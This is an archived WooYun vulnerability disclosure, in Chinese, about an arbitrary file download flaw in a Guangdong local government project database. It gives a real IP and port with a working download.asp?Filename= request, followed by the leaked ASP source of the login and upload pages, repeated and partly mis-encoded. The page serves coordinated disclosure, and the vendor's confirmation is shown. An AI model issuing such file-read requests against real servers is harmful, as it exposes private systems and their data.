当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0104491

漏洞标题:广东省某市内资经济促进中心项目数据系统任意文件下载和查看

相关厂商:广东省信息安全测评中心

漏洞作者: 一刀

提交时间:2015-03-31 10:27

修复时间:2015-05-15 15:58

公开时间:2015-05-15 15:58

漏洞类型:

危害等级:低

自评Rank:1

漏洞状态:已交由第三方合作机构(广东省信息安全测评中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-03-31: 细节已通知厂商并且等待厂商处理中
2015-03-31: 厂商已经确认,细节仅向厂商公开
2015-04-10: 细节向核心白帽子及相关领域专家公开
2015-04-20: 细节向普通白帽子公开
2015-04-30: 细节向实习白帽子公开
2015-05-15: 细节向公众公开

简要描述:

其实这个系统出过弱密码登录或者万能密码登录,现在呢又加了一个waf

详细说明:

以前的漏洞 WooYun: 广东省某市内资经济促进中心项目数据系统弱口令续(涉及大量数亿元的项目)
现在加了一个防火墙,就希望厂商给一个邀请码,这个漏洞没有重复哦!

漏洞证明:

任意文件查看,admin/login.asp
218.16.125.82:8081/download.asp?Filename=admin/login.asp
code:<%@LANGUAGE="VBSCRIPT" CODEPAGE="936"%>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=gb2312" />
<title>��ҵ��Դ��Ϣ���ݿ�ϵͳ - ��̨����</title>
<link href="css/admin.css" rel="stylesheet" type="text/css" />
<style>
body{background-color:#3191fc; }
</style>
</head>
<body>
<table width="1100" border="0" align="center" cellpadding="0" cellspacing="0" style="margin-top:300px;">
<tr>
<td width="694"><img src="images/adminlogo.png" width="694" height="167" /></td>
<td width="406" align="center" style="background-image:url(images/dl.png)"><form action="logininfo.asp" method="get" id="form1"><table width="80%" border="0" align="right" style="margin-top:50px;">
<tr>
<td width="23%" class="loginwen14px">�û�����</td>
<td width="77%" align="left"><label for="auser"></label>
<input name="auser" type="text" id="auser" size="28" /></td>
</tr>
<tr>
<td class="loginwen14px">��&nbsp;&nbsp;�룺</td>
<td align="left"><label for="apass"></label>
<input name="apass" type="password" id="apass" size="30" /></td>
</tr>
<tr>
<td>&nbsp;</td>
<td align="left"><input type="submit" name="button" id="button" value="��½" />
<input type="reset" name="button2" id="button2" value="����" />
<input type="button" name="button3" id="button3" value="�˳�"onclick="window.opener=null;window.close();"/>
<input type="button" name="button4" id="button4" value=" ������ҳ " onclick="window.location.href='../index.asp'" /></td>
</tr>
</table></form></td>
</tr>
<tr>
<td>&nbsp;</td>
<td>&nbsp;</td>
</tr>
<tr>
<td height="200" colspan="2" align="center" valign="bottom" class="loginBottom"><span class="loginwen12px">����֧�֣�</span><a href="http://www.sun-info.com">��ݸ��������Ϣ�Ƽ����޹�˾</a></td>
</tr>
</table>
</body>
</html>
<%@LANGUAGE="VBSCRIPT" CODEPAGE="936"%>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=gb2312" />
<title>��ҵ��Դ��Ϣ���ݿ�ϵͳ - ��̨����</title>
<link href="css/admin.css" rel="stylesheet" type="text/css" />
<style>
body{background-color:#3191fc; }
</style>
</head>
<body>
<table width="1100" border="0" align="center" cellpadding="0" cellspacing="0" style="margin-top:300px;">
<tr>
<td width="694"><img src="images/adminlogo.png" width="694" height="167" /></td>
<td width="406" align="center" style="background-image:url(images/dl.png)"><form action="logininfo.asp" method="get" id="form1"><table width="80%" border="0" align="right" style="margin-top:50px;">
<tr>
<td width="23%" class="loginwen14px">�û�����</td>
<td width="77%" align="left"><label for="auser"></label>
<input name="auser" type="text" id="auser" size="28" /></td>
</tr>
<tr>
<td class="loginwen14px">��&nbsp;&nbsp;�룺</td>
<td align="left"><label for="apass"></label>
<input name="apass" type="password" id="apass" size="30" /></td>
</tr>
<tr>
<td>&nbsp;</td>
<td align="left"><input type="submit" name="button" id="button" value="��½" />
<input type="reset" name="button2" id="button2" value="����" />
<input type="button" name="button3" id="button3" value="�˳�"onclick="window.opener=null;window.close();"/>
<input type="button" name="button4" id="button4" value=" ������ҳ " onclick="window.location.href='../index.asp'" /></td>
</tr>
</table></form></td>
</tr>
<tr>
<td>&nbsp;</td>
<td>&nbsp;</td>
</tr>
<tr>
<td height="200" colspan="2" align="center" valign="bottom" class="loginBottom"><span class="loginwen12px">����֧�֣�</span><a href="http://www.sun-info.com">��ݸ��������Ϣ�Ƽ����޹�˾</a></td>
</tr>
</table>
</body>
</html>
<%@LANGUAGE="VBSCRIPT" CODEPAGE="936"%>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=gb2312" />
<title>��ҵ��Դ��Ϣ���ݿ�ϵͳ - ��̨����</title>
<link href="css/admin.css" rel="stylesheet" type="text/css" />
<style>
body{background-color:#3191fc; }
</style>
</head>
<body>
<table width="1100" border="0" align="center" cellpadding="0" cellspacing="0" style="margin-top:300px;">
<tr>
<td width="694"><img src="images/adminlogo.png" width="694" height="167" /></td>
<td width="406" align="center" style="background-image:url(images/dl.png)"><form action="logininfo.asp" method="get" id="form1"><table width="80%" border="0" align="right" style="margin-top:50px;">
<tr>
<td width="23%" class="loginwen14px">�û�����</td>
<td width="77%" align="left"><label for="auser"></label>
<input name="auser" type="text" id="auser" size="28" /></td>
</tr>
<tr>
<td class="loginwen14px">��&nbsp;&nbsp;�룺</td>
<td align="left"><label for="apass"></label>
<input name="apass" type="password" id="apass" size="30" /></td>
</tr>
<tr>
<td>&nbsp;</td>
<td align="left"><input type="submit" name="button" id="button" value="��½" />
<input type="reset" name="button2" id="button2" value="����" />
<input type="button" name="button3" id="button3" value="�˳�"onclick="window.opener=null;window.close();"/>
<input type="button" name="button4" id="button4" value=" ������ҳ " onclick="window.location.href='../index.asp'" /></td>
</tr>
</table></form></td>
</tr>
<tr>
<td>&nbsp;</td>
<td>&nbsp;</td>
</tr>
<tr>
<td height="200" colspan="2" align="center" valign="bottom" class="loginBottom"><span class="loginwen12px">����֧�֣�</span><a href="http://www.sun-info.com">��ݸ��������Ϣ�Ƽ����޹�˾</a></td>
</tr>
</table>
</body>
</html><%@LANGUAGE="VBSCRIPT" CODEPAGE="936"%>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=gb2312" />
<title>��ҵ��Դ��Ϣ���ݿ�ϵͳ - ��̨����</title>
<link href="css/admin.css" rel="stylesheet" type="text/css" />
<style>
body{background-color:#3191fc; }
</style>
</head>
<body>
<table width="1100" border="0" align="center" cellpadding="0" cellspacing="0" style="margin-top:300px;">
<tr>
<td width="694"><img src="images/adminlogo.png" width="694" height="167" /></td>
<td width="406" align="center" style="background-image:url(images/dl.png)"><form action="logininfo.asp" method="get" id="form1"><table width="80%" border="0" align="right" style="margin-top:50px;">
<tr>
<td width="23%" class="loginwen14px">�û�����</td>
<td width="77%" align="left"><label for="auser"></label>
<input name="auser" type="text" id="auser" size="28" /></td>
</tr>
<tr>
<td class="loginwen14px">��&nbsp;&nbsp;�룺</td>
<td align="left"><label for="apass"></label>
<input name="apass" type="password" id="apass" size="30" /></td>
</tr>
<tr>
<td>&nbsp;</td>
<td align="left"><input type="submit" name="button" id="button" value="��½" />
<input type="reset" name="button2" id="button2" value="����" />
<input type="button" name="button3" id="button3" value="�˳�"onclick="window.opener=null;window.close();"/>
<input type="button" name="button4" id="button4" value=" ������ҳ " onclick="window.location.href='../index.asp'" /></td>
</tr>
</table></form></td>
</tr>
<tr>
<td>&nbsp;</td>
<td>&nbsp;</td>
</tr>
<tr>
<td height="200" colspan="2" align="center" valign="bottom" class="loginBottom"><span class="loginwen12px">����֧�֣�</span><a href="http://www.sun-info.com">��ݸ��������Ϣ�Ƽ����޹�˾</a></td>
</tr>
</table>
</body>
</html>
<%@LANGUAGE="VBSCRIPT" CODEPAGE="936"%>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=gb2312" />
<title>��ҵ��Դ��Ϣ���ݿ�ϵͳ - ��̨����</title>
<link href="css/admin.css" rel="stylesheet" type="text/css" />
<style>
body{background-color:#3191fc; }
</style>
</head>
<body>
<table width="1100" border="0" align="center" cellpadding="0" cellspacing="0" style="margin-top:300px;">
<tr>
<td width="694"><img src="images/adminlogo.png" width="694" height="167" /></td>
<td width="406" align="center" style="background-image:url(images/dl.png)"><form action="logininfo.asp" method="get" id="form1"><table width="80%" border="0" align="right" style="margin-top:50px;">
<tr>
<td width="23%" class="loginwen14px">�û�����</td>
<td width="77%" align="left"><label for="auser"></label>
<input name="auser" type="text" id="auser" size="28" /></td>
</tr>
<tr>
<td class="loginwen14px">��&nbsp;&nbsp;�룺</td>
<td align="left"><label for="apass"></label>
<input name="apass" type="password" id="apass" size="30" /></td>
</tr>
<tr>
<td>&nbsp;</td>
<td align="left"><input type="submit" name="button" id="button" value="��½" />
<input type="reset" name="button2" id="button2" value="����" />
<input type="button" name="button3" id="button3" value="�˳�"onclick="window.opener=null;window.close();"/>
<input type="button" name="button4" id="button4" value=" ������ҳ " onclick="window.location.href='../index.asp'" /></td>
</tr>
</table></form></td>
</tr>
<tr>
<td>&nbsp;</td>
<td>&nbsp;</td>
</tr>
<tr>
<td height="200" colspan="2" align="center" valign="bottom" class="loginBottom"><span class="loginwen12px">����֧�֣�</span><a href="http://www.sun-info.com">��ݸ��������Ϣ�Ƽ����޹�˾</a></td>
</tr>
</table>
</body>
</html>
admin/upload.asp内文件
218.16.125.82:8081/download.asp?Filename=/admin/upload.asp
<%@LANGUAGE="VBSCRIPT" CODEPAGE="936"%>
<%
'----------------------------------------------------------
'************** ���� ASP �������ϴ��� V2.11 ***************
'�÷�����������Ӧ��[���Ӳ�Ʒһ]
'������Ҫ˵��Ĭ��ģʽ�µ�����
'�Գ����IJ�Ʒ����Ϊ��<br>
'������UTF-8�ַ�������
'�������ϴ�����(upload.asp)�Ĵ�����ע��
'**********************************************************
'----------------------------------------------------------
OPTION EXPLICIT
Server.ScriptTimeOut=5000
%>
<!--#include file="UpLoadClass.asp"-->
<%
dim request2
'�����ϴ�����
set request2=New UpLoadClass
'�����ַ���
request2.Charset="gb2312"
'�

修复方案:

虽然问题不大,但请你们赏一个邀请码啊!我们挖这个也很辛苦!
修复你们比我更懂的

版权声明:转载请注明来源 一刀@乌云


漏洞回应

厂商回应:

危害等级:中

漏洞Rank:5

确认时间:2015-03-31 15:56

厂商回复:

非常感谢您的报告。
报告中的问题已确认并复现.
影响的数据:中
攻击成本:低
造成影响:中
综合评级为:中,rank:5
正在联系相关网站管理单位处置。

最新状态:

暂无